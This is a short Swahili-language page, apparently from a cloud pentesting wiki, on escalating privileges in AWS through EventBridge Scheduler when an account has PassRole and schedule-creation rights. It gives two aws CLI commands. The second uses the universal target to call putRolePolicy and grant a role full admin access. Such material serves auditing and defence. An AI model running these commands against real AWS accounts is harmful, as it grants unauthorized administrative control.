AWS - EventBridge Scheduler Privesc

Reading time: 3 minutes

EventBridge Scheduler

Maelezo zaidi kuhusu EventBridge Scheduler katika:

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Mshambuliaji mwenye ruhusa hizo ataweza kuunda|kupdate ratiba na kutumia ruhusa za jukumu la ratiba lililounganishwa nayo kufanya kitendo chochote

Kwa mfano, wanaweza kuweka ratiba ili kuitisha kazi ya Lambda ambayo ni kitendo kilichopangwa:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

Mbali na hatua za huduma zilizotengenezwa, unaweza kutumia lengo la ulimwengu katika EventBridge Scheduler kuanzisha anuwai ya operesheni za API kwa huduma nyingi za AWS. Lengo la ulimwengu linatoa kubadilika kuanzisha karibu kila API. Mfano mmoja unaweza kuwa kutumia lengo la ulimwengu kuongeza "AdminAccessPolicy", ukitumia jukumu ambalo lina sera ya "putRolePolicy":

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

Marejeo

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html
• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html